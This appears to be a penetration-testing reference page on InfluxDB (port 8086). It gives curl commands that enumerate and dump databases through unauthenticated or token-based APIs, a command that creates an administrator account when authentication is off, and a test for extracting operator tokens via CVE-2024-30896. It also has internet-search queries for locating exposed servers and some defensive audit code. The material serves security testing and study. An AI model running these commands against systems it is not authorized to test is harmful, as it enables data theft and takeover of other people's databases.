8086 - Influxdb

💡 Learning tip: This document covers penetration-testing methods for 8086 - InfluxDB and is intended as a reference for information-security beginners and practitioners.

⚠️ Legal notice: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.


If you **get an error like** this one: `ERR: unable to parse authentication credentials`, it means the server is **expecting credentials**:

```bash
influx --username influx --password influx_pass
```

There was an authentication bypass vulnerability in InfluxDB (versions before 1.7.6): [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933).

#### Manual Enumeration (v1 HTTP API / InfluxQL)

Even when no CLI is available, the HTTP API is usually exposed on port 8086.

```bash
# List databases (unauth)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"

# List retention policies of a DB
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"

# List users (if auth disabled)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"

# List measurements (tables)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"

# List field keys (columns)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"

# Dump data from a measurement
curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=telegraf" \
  --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .

# Force epoch timestamps (useful for tooling)
curl -sG "http://<host>:8086/query" \
  --data-urlencode "epoch=ns" \
  --data-urlencode "db=telegraf" \
  --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'
```

**Warning:** In some testing with the authentication bypass it was noted that the measurement name needed to be enclosed in double quotes, e.g. `select * from "cpu"`.

If authentication is disabled, you can even create users and escalate:

```bash
# Create an admin user (v1, auth disabled)
curl -sG "http://<host>:8086/query" \
  --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"
```
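As an added example (not part of the original page), the following Python script turns the unauthenticated `SHOW DATABASES` probe above into an audit check for your own instances: it tells an open v1 API apart from one that demands credentials by reading the HTTP status and the error string, and it flattens the v1 JSON response shape (`results[].series[].columns/values`) into rows, which works for the `SELECT` dumps as well. The sample bodies are constructed, and `probe()` with its base URL is an assumption, not something the page provides.

```python
import json
import urllib.error, urllib.parse, urllib.request
from typing import Any, Dict, List, Tuple

# Constructed sample bodies mirroring the v1 /query response shapes (not captured from a real host).
OPEN_BODY = json.dumps({"results": [{"statement_id": 0, "series": [
    {"name": "databases", "columns": ["name"], "values": [["telegraf"], ["_internal"]]}]}]})
NOAUTH_BODY = json.dumps({"error": "unable to parse authentication credentials"})
BADCREDS_BODY = json.dumps({"error": "authorization failed"})

def series_to_rows(body: str) -> List[Dict[str, Any]]:
    """Flatten every series in a v1 /query response into dict rows (one key per column
    plus '_series' for the series name); works for SHOW ... and SELECT results alike."""
    rows: List[Dict[str, Any]] = []
    for result in json.loads(body).get("results", []):
        if "error" in result:  # per-statement errors arrive inside an HTTP 200 response
            raise ValueError(result["error"])
        for series in result.get("series", []):
            for values in series.get("values", []):
                row: Dict[str, Any] = {"_series": series["name"]}
                row.update(zip(series["columns"], values))
                rows.append(row)
    return rows

def classify_exposure(status: int, body: str) -> str:
    """Audit verdict for one unauthenticated 'SHOW DATABASES' probe."""
    try:
        data = json.loads(body)
    except ValueError:
        return "not-influx-v1"
    err = data.get("error", "")
    if status == 401 and "authentication credentials" in err:
        return "auth-required"                 # auth is on; this is the healthy state
    if status == 401 and "authorization failed" in err:
        return "auth-required-bad-credentials"
    if status == 200 and "results" in data:    # no auth: databases are listed to anyone
        dbs = [r["name"] for r in series_to_rows(body) if r["_series"] == "databases"]
        return "open" if dbs else "open-no-databases"
    return "unknown"

def probe(base_url: str, timeout: float = 5.0) -> Tuple[int, str]:
    """Issue the probe against e.g. http://127.0.0.1:8086 (assumed base URL) and return
    (status, body), keeping a 401 body so classify_exposure() can read the error string."""
    url = base_url.rstrip("/") + "/query?" + urllib.parse.urlencode({"q": "SHOW DATABASES"})
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()
```

Run `classify_exposure(*probe("http://<host>:8086"))` against an instance you administer; anything other than `auth-required` means the v1 API answers without credentials.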

The information in the following CLI example was taken from here.

##### Show databases

The databases found are `telegraf` and `_internal` (the latter is present on every instance).

```
> show databases
name: databases
name
----
telegraf
_internal
```

##### Show tables/measurements

The InfluxDB documentation explains that measurements in InfluxDB are the counterpart of SQL tables. The name of each measurement indicates what it holds: each one stores data about a particular entity.

```
> show measurements
name: measurements
name
----
cpu
disk
diskio
kernel
mem
processes
swap
system
```

##### Show columns/field keys

Field keys correspond to the columns of a table.

```
> show field keys
name: cpu
fieldKey         fieldType
--------         ---------
usage_guest      float
usage_guest_nice float
usage_idle       float
usage_iowait     float

name: disk
fieldKey     fieldType
--------     ---------
free         integer
inodes_free  integer
inodes_total integer
inodes_used  integer

[ ... more keys ...]
```

##### Dump Table

Finally, you can dump a measurement with a query such as:

```
select * from cpu
name: cpu
time                cpu       host   usage_guest usage_guest_nice usage_idle        usage_iowait        usage_irq usage_nice usage_softirq        usage_steal usage_system        usage_user
----                ---       ----   ----------- ---------------- ----------        ------------        --------- ---------- -------------        ----------- ------------        ----------
1497018760000000000 cpu-total ubuntu 0           0                99.297893681046   0                   0         0          0                    0           0.35105315947842414 0.35105315947842414
1497018760000000000 cpu1      ubuntu 0           0                99.69909729188728 0                   0         0          0                    0           0.20060180541622202 0.10030090270811101
```

#### InfluxDB v2.x API (Token-based)

InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate:

```bash
# Basic org, bucket, and auth discovery
TOKEN="<token>"
# Keep the whole header in one variable and pass it quoted (-H "$AUTH"); an unquoted
# "-H Authorization: Token $TOKEN" would be split into separate words and curl would
# treat "Token" and the token value as URLs.
AUTH="Authorization: Token $TOKEN"

# Health & version
curl -s http://<host>:8086/health | jq .

# List organizations
curl -s -H "$AUTH" http://<host>:8086/api/v2/organizations | jq .

# List buckets
curl -s -H "$AUTH" 'http://<host>:8086/api/v2/buckets?limit=100' | jq .

# List authorizations (requires perms)
ORGID=<org_id>
curl -s -H "$AUTH" "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .

# Query data with Flux (the org is passed as a query parameter)
curl -s -H "$AUTH" -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \
  -X POST "http://<host>:8086/api/v2/query?orgID=$ORGID" \
  --data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'
```

Notes

- For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests.
- In v2, the HTTP `Authorization` header must be in the form `Token <value>`.
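An added example (not from the original page): the `/api/v2/query` call above returns Flux annotated CSV rather than JSON, and this Python parser handles the `#datatype`, `#group` and `#default` annotation rows, the leading annotation column and blank-line-separated result tables. The sample CSV is constructed to mirror that layout, not captured from a real host.

```python
import csv
import io
from typing import Any, Dict, List

# Constructed sample of the annotated CSV /api/v2/query returns for a query like
# from(bucket:"telegraf") |> range(start:-1h) |> limit(n:2)  (not captured from a real host).
SAMPLE_CSV = """#group,false,false,true,true,false,false,true,true,true,true
#datatype,string,long,dateTime:RFC3339,dateTime:RFC3339,dateTime:RFC3339,double,string,string,string,string
#default,_result,,,,,,,,,
,result,table,_start,_stop,_time,_value,_field,_measurement,cpu,host
,,0,2024-01-01T00:00:00Z,2024-01-01T01:00:00Z,2024-01-01T00:00:10Z,99.29,usage_idle,cpu,cpu-total,ubuntu
,,0,2024-01-01T00:00:00Z,2024-01-01T01:00:00Z,2024-01-01T00:00:20Z,98.71,usage_idle,cpu,cpu-total,ubuntu

"""

# Casts for the #datatype names that are not plain strings.
_CASTS = {"long": int, "unsignedLong": int, "double": float,
          "boolean": lambda v: v == "true"}

def parse_annotated_csv(text: str) -> List[Dict[str, Any]]:
    """Parse Flux annotated CSV into dict rows, applying #datatype casts and
    #default fill-ins. Several result tables separated by blank lines are supported."""
    rows: List[Dict[str, Any]] = []
    datatypes: List[str] = []
    defaults: List[str] = []
    header: List[str] = []
    for rec in csv.reader(io.StringIO(text)):
        if not rec or all(c == "" for c in rec):    # blank line separates result tables
            header, datatypes, defaults = [], [], []
            continue
        tag, cells = rec[0], rec[1:]                 # column 0 holds the annotation marker
        if tag == "#datatype":
            datatypes = cells
        elif tag == "#default":
            defaults = cells
        elif tag.startswith("#"):                    # "#group" and any other annotation
            continue
        elif not header:                             # first unannotated line is the header
            header = cells
        else:
            row: Dict[str, Any] = {}
            for i, (name, raw) in enumerate(zip(header, cells)):
                if raw == "" and i < len(defaults):
                    raw = defaults[i]                # #default fills empty cells
                cast = _CASTS.get(datatypes[i]) if i < len(datatypes) else None
                row[name] = cast(raw) if cast and raw != "" else raw
            rows.append(row)
    return rows
```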

#### Automated Enumeration

```bash
msf6 > use auxiliary/scanner/http/influxdb_enum
```

#### Recent vulns and privesc of interest (last years)

- **InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896).** Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test:

  ```bash
  # Using a low-priv/all-access token tied to the default org
  curl -s -H 'Authorization: Token <user_or_allAccess_token>' \
    'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
  # Look for entries of type "operator" and extract the raw token (if present)
  ```

- Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you.

#### Search engine syntax

FOFA

```
# FOFA search syntax
port="8086"
```

Shodan

```
# Shodan search syntax
port:8086
```

ZoomEye

```
# ZoomEye search syntax
port:8086
```

#### 📖 References